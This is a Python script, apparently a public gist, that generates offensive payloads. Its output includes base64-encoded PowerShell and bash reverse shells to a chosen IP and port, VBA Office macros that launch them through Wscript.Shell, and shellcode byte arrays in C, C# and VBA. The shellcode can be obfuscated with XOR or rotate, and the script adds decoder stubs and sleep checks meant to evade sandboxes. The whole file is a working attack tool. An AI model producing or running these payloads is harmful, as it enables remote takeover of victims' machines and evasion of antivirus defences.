@jakobfriedl
Last active August 5, 2024 07:03
Generate payloads (reverse shell, macro, shellcode, ...)
#!/usr/bin/env python3
# Author: Jakob Friedl
# Description: Generate payloads
import sys
import argparse
import base64
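parser = argparse.ArgumentParser(description="Payload generator v1")
# Each payload kind is its own sub-command; argparse stores the chosen name in
# `args.type` and rejects an invocation with no sub-command (required=True).
subparsers = parser.add_subparsers(dest='type', required=True)

# `revshell`: one-liner for the chosen shell, optionally wrapped as VBA macro lines.
# `--port` is kept as a string here; revshell() converts it with int() itself.
parser_revshell = subparsers.add_parser('revshell')
parser_revshell.add_argument('--ip', required=True, help='IP address for the reverse shell payload.')
parser_revshell.add_argument('--port', required=True, help='Port for the reverse shell payload.')
parser_revshell.add_argument('--format', required=True, help='Output format of the reverse shell payload.', choices=['ps1', 'bash'])
parser_revshell.add_argument('-m', '--macro', action='store_true', help='Output in VBA Office macro format.')

# `shellcode`: read a raw file and print it as a source-code byte array, optionally
# transformed (--xor / --rot) together with a decoder stub for the chosen format.
parser_shellcode = subparsers.add_parser('shellcode')
parser_shellcode.add_argument('--file', required=True, help='Shellcode file.')
parser_shellcode.add_argument('--xor', help='XOR the shellcode with a key byte.', type=int)
parser_shellcode.add_argument('--rot', help='Rotate the bytes in the shellcode.', type=int)
parser_shellcode.add_argument('--sleep', help='Sleep for a given number of seconds.', type=float)
# This --format describes the shellcode output; the revshell sub-command has its own.
parser_shellcode.add_argument('--format', required=True, help='Output format of the shellcode payload.', choices=['vba', 'c', 'csharp', 'ps1', 'bin'])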
def format_c(shellcode):
    """Render ``shellcode`` (an iterable of ints) as a C ``unsigned char buf[]`` initializer.

    Bytes are written as ``0xNN,`` with a line break (``\\n ``) after every tenth byte.
    The last character before the closing ``};`` is always dropped, which removes the
    trailing comma (or the trailing space of a line break when the length is a multiple
    of ten).
    """
    pieces = ['unsigned char buf[] = {\n ']
    for position, byte in enumerate(shellcode, start=1):
        pieces.append('0x%0.2X,' % byte)
        if position % 10 == 0:
            pieces.append('\n ')
    text = ''.join(pieces)
    return text[:-1] + '};'
def format_csharp(shellcode):
    """Render ``shellcode`` as a C# ``byte[] buf = new byte[N] { ... };`` declaration.

    ``N`` is ``len(shellcode)``, so the argument must support ``len()``. Bytes are
    written as ``0xNN,`` with a line break after every tenth byte; the final character
    before ``};`` (a comma, or the space of a line break) is dropped.
    """
    pieces = ['byte[] buf = new byte[%d] {\n ' % len(shellcode)]
    for position, byte in enumerate(shellcode, start=1):
        pieces.append('0x%0.2X,' % byte)
        if position % 10 == 0:
            pieces.append('\n ')
    text = ''.join(pieces)
    return text[:-1] + '};'
def format_vba(shellcode):
    """Render ``shellcode`` as a VBA ``Array(...)`` assignment to a Variant ``buf``.

    Values are written in decimal (``%d``, so values above 255 are emitted as-is),
    with a VBA line continuation (`` _\\n``) after every fortieth value. The last
    character before the closing ``)`` is dropped (the trailing comma, or the newline
    of a line continuation when the length is a multiple of forty).
    """
    pieces = ['Dim buf as Variant\nbuf = Array(']
    for position, byte in enumerate(shellcode, start=1):
        pieces.append('%d,' % byte)
        if position % 40 == 0:
            pieces.append(' _\n')
    text = ''.join(pieces)
    return text[:-1] + ')'
def xor_c(key):
    """Return a C snippet that XORs each element of ``buf`` in place with ``key``.

    The snippet starts with a newline and has no trailing newline; ``key`` is
    substituted with ``%d``. It assumes the ``buf`` array emitted by ``format_c``.
    """
    lines = (
        '',
        'for (int i = 0; i < (int)sizeof(buf) - 1; i++)',
        '{',
        'buf[i] = buf[i]^%d;',
        '}',
    )
    return '\n'.join(lines) % key
def rot_c(rot_num):
    """Return a C snippet that subtracts ``rot_num`` from each ``buf`` element modulo 256.

    Counterpart of ``rot()`` for the ``c`` format. Starts with a newline, no trailing
    newline; ``rot_num`` is substituted with ``%d``.
    """
    lines = (
        '',
        'for (int i = 0; i < (int)sizeof(buf); i++)',
        '{',
        'buf[i] =(buf[i] - %d) & 0xFF;',
        '}',
    )
    return '\n'.join(lines) % rot_num
def xor_vba(key):
    """Return a VBA snippet that XORs each element of ``buf`` with ``key``.

    Iterates ``LBound(buf)`` to ``UBound(buf)``, matching the array emitted by
    ``format_vba``. Starts with a newline, no trailing newline.
    """
    lines = (
        '',
        'Dim i As Integer',
        'For i = LBound(buf) to UBound(buf)',
        'buf(i) = buf(i) Xor %d',
        'Next i',
    )
    return '\n'.join(lines) % key
def rot_vba(rot_num):
    """Return a VBA snippet that subtracts ``rot_num`` from each ``buf`` element.

    Each result is written one byte at a time via ``RtlMoveMemory`` to ``addr + counter``;
    neither ``addr`` nor the ``RtlMoveMemory`` declaration is emitted by this script, so
    the surrounding VBA must provide them. Starts with a newline, no trailing newline.
    """
    lines = (
        '',
        'Dim data As Long',
        'Dim counter As Integer',
        'For counter = LBound(buf) To UBound(buf)',
        'data = buf(counter) - %d',
        'res = RtlMoveMemory(addr + counter, data, 1)',
        'Next counter',
    )
    return '\n'.join(lines) % rot_num
def sleep_vba(time):
    """Return a VBA snippet that sleeps ``time`` seconds and exits early if less elapsed.

    ``time`` is in seconds (a float from ``--sleep``); the ``Sleep`` call receives
    ``time*1000`` and the comparison receives ``time``, both truncated by ``%d``.
    Starts with a newline, no trailing newline.
    """
    lines = (
        '',
        'Dim t1 As Date',
        'Dim t2 As Date',
        'Dim time As Long',
        't1 = Now()',
        'Sleep (%d)',
        't2 = Now()',
        'time = DateDiff("s", t1, t2)',
        'If time < %d Then',
        'Exit Function',
        'End If',
    )
    millis = time * 1000
    return '\n'.join(lines) % (millis, time)
def rot_csharp(rot_num):
    """Return a C# snippet that subtracts ``rot_num`` from each ``buf`` element modulo 256.

    Operates on the ``byte[] buf`` emitted by ``format_csharp``. Starts with a newline,
    no trailing newline.
    """
    lines = (
        '',
        'for (int i = 0; i < buf.Length; i++)',
        '{',
        'buf[i] = (byte)(((uint)buf[i] - %d) & 0xFF);',
        '}',
    )
    return '\n'.join(lines) % rot_num
def sleep_csharp(time):
    """Return a C# snippet that sleeps ``time`` seconds and returns early if less elapsed.

    ``time`` is in seconds; ``Sleep`` receives ``time * 1000`` and the comparison
    receives ``time``, both truncated by ``%d``. Starts with a newline, no trailing
    newline.
    """
    lines = (
        '',
        'DateTime t1 = DateTime.Now;',
        'Sleep(%d);',
        'double t2 = DateTime.Now.Subtract(t1).TotalSeconds;',
        'if(t2 < %d)',
        '{',
        'return;',
        '}',
    )
    millis = time * 1000
    return '\n'.join(lines) % (millis, time)
def xor(shellcode, args):
    """Return a list of each value in ``shellcode`` XORed with ``args.xor``.

    No masking is applied, so a key wider than one byte yields values above 255.
    """
    key = args.xor
    return [key ^ value for value in shellcode]
def rot(shellcode, args):
    """Return a list with ``args.rot`` added to each value in ``shellcode``.

    For ``args.format == 'vba'`` the sums are left unmasked (they may exceed 255);
    for every other format each sum is reduced modulo 256.
    """
    shift = args.rot
    if args.format == 'vba':
        return [value + shift for value in shellcode]
    return [(value + shift) & 0xFF for value in shellcode]
def print_timedelay(args):
    """Print the sleep stub for ``args.format`` using ``args.sleep`` seconds.

    Only ``vba`` and ``csharp`` have a stub; other formats print nothing.
    """
    renderers = {'vba': sleep_vba, 'csharp': sleep_csharp}
    render = renderers.get(args.format)
    if render is not None:
        print(render(args.sleep))
def print_shellcode(payload, format):
    """Print ``payload`` as a byte array in the source language named by ``format``.

    Handles ``c``, ``csharp`` and ``vba``; any other value (``ps1``, ``bin``) prints
    nothing.
    """
    renderers = {'c': format_c, 'csharp': format_csharp, 'vba': format_vba}
    render = renderers.get(format)
    if render is not None:
        print(render(payload))
def print_decoders(args):
    """Print the decoder stub(s) for the transforms selected in ``args``.

    For ``vba`` and ``c`` the XOR stub (if ``--xor``) is printed before the rotate
    stub (if ``--rot``); for ``csharp`` only a rotate stub exists; other formats
    print nothing.
    """
    fmt = args.format
    if fmt == 'vba':
        stubs = ((args.xor, xor_vba), (args.rot, rot_vba))
    elif fmt == 'c':
        stubs = ((args.xor, xor_c), (args.rot, rot_c))
    elif fmt == 'csharp':
        stubs = ((args.rot, rot_csharp),)
    else:
        stubs = ()
    for value, render in stubs:
        if value is not None:
            print(render(value))
# Powershell reverse shell payload
def revshell():
    """Print a reverse-shell command line for the format selected in the global ``args``.

    Reads ``args.format``, ``args.ip``, ``args.port`` and ``args.macro`` from the
    module-level ``args`` assigned under ``__main__``. ``args.port`` is converted with
    ``int()`` here, so a non-numeric port raises ``ValueError``. Output goes to stdout;
    nothing is returned.
    """
    if args.format == 'ps1':
        # %-format template: '%%' is a literal '%' (the PowerShell pipeline alias).
        payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
        payload = payload % (args.ip, int(args.port))
        # Encode payload as base64 string. Python's 'utf16' codec prepends a two-byte BOM,
        # which the [2:] slice drops before base64-encoding.
        cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
        if args.macro:
            # Line length: the command is emitted in 50-character pieces as VBA string
            # concatenation, then run via Wscript.Shell.
            n = 50
            print("Dim Str as String")
            for i in range(0, len(cmdline), n):
                print("Str = Str + " + '"' + cmdline[i:i+n] + '"')
            print('CreateObject("Wscript.Shell").Run Str')
            return
    if args.format == 'bash':
        payload = "bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'" % (args.ip, int(args.port))
        # Same 'utf16' + [2:] encoding as the ps1 branch, wrapped in an echo | base64 -d pipeline.
        cmdline = "echo " + base64.b64encode(payload.encode('utf16')[2:]).decode() + " | base64 -d | bash"
    print(cmdline)
# Shellcode payload
def shellcode():
    """Read the file named by the global ``args.file`` and print it as a byte array.

    Uses the module-level ``args`` assigned under ``__main__``. Transform order is
    fixed: ``--rot`` first, then ``--xor``. Output order is: the sleep stub (if
    ``--sleep``), the formatted array for ``args.format``, then the decoder stub(s).
    Everything goes to stdout; nothing is returned.
    """
    with open(args.file, mode='rb') as handle:
        data = handle.read()
    # Rotate before XOR; print_decoders() emits the matching stubs for the format.
    if args.rot is not None:
        data = rot(data, args)
    if args.xor is not None:
        data = xor(data, args)
    if args.sleep is not None:
        print_timedelay(args)
    print_shellcode(data, args.format)
    print_decoders(args)
if __name__ == '__main__':
    # `args` is deliberately module-global: revshell() and shellcode() read it directly.
    args = parser.parse_args()
    handlers = {'revshell': revshell, 'shellcode': shellcode}
    handler = handlers.get(args.type)
    if handler is not None:
        handler()